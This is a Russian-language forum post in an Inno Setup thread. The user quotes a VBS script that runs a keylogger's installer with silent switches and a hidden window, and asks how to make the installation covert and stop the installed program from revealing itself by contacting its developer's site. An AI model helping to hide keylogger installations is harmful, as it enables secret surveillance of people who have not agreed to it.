Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  

Название темы: Inno Setup. Прочие вопросы
Показать сообщение отдельно

Новый участник


Сообщения: 30
Благодарности: 2

Профиль | Отправить PM | Цитировать


Привет всем. Подскажите пожалуйста, возможно ли посмотреть возможные ключи для тихой установки скачанной мной программы?
Сам я даже не знаю с чего начать. Успел только узнать как определить компилятор. Оказался Inno Setup. Хочу изменить способ тихой установки.
В папке с программой присутствует файл vbs в котором прописаны ключи, после запуска данного файла начинается (ДОЛЖНА НО НЕ УСТАНАВЛИВАЕТСЯ) установка в скрытом режиме. Этот установщик создан кейлоггером и предназначен для запуска в локальной сети, в папке созданы программа. exe, ключи лицензии. bin, настройки программы. bin, файлы запуска скрытой установки и удаления vbs. Попробовал запустить не в локалке, комп чет подумал себе и все-результата ноль, залез я в vbs файл скрытой установки убрал из прописанных ключей /NET и вроде все заработало, пошла скрытая установка но после установки программа заходит в интернет на сайт разработчика тем самым палится.

Вот что в файле:
Код: Выделить весь код
rem -------------------------------------------------------------------
dim objShell
set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "NetInstall.exe", "/VERYSILENT /SUPPRESSMSGBOXES /NORESTART /NET", "", "open", 0
set objShell = nothing
rem -------------------------------------------------------------------

Последний раз редактировалось AlexKatana, 26-10-2014 в 00:49. Причина: Добавляю скрипт


Отправлено: 00:22, 26-10-2014 | #503

Название темы: Inno Setup. Прочие вопросы